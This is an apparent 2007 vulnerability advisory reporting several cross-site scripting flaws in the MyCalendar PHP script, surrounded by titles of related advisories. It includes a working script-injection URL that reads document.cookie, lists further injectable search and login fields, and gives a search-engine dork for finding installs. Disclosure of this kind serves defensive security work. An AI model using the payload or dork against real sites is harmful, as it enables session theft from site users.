Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) ESupport Multiple HTML Injection Vulnerabilities MediaWiki Cross-site Scripting XLAtunes 0.1 (album) Remote SQL Injection Vulnerability Vivvo Article Manager 3.4 (root) Local File Inclusion Vulnerability From:sn0oPy.team_(at)_gmail.com <sn0oPy.team_(at)_gmail.com> Date:20.02.2007Subject:MyCalendar multiple XSS* MyCalendar multiple XSS * By : sn0oPy * Risk : medium * site : http://abledesign.com/programs/MyCalendar/ * exploit : XSS on the search menu : http://www.target.ma/calendar/index.php?go=search XSS on the url : http://www.target.ma/calendar/index.php?go="><script>alert(docu ment.cookie)</script> XSS on the username and password at http://www.target.ma/crown/cal/index.php?go=Login * dork : intitle:"myCalendar" * contact : sn0oPy@avenir-geopolitique.net * Site : http://forums.avenir-geopolitique.net * greetz : [subzero], Avg Team. * Reference : http://forums.avenir-geopolitique.net/viewtopic.php?t=2686
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
ESupport Multiple HTML Injection Vulnerabilities
MediaWiki Cross-site Scripting
XLAtunes 0.1 (album) Remote SQL Injection Vulnerability
Vivvo Article Manager 3.4 (root) Local File Inclusion Vulnerability
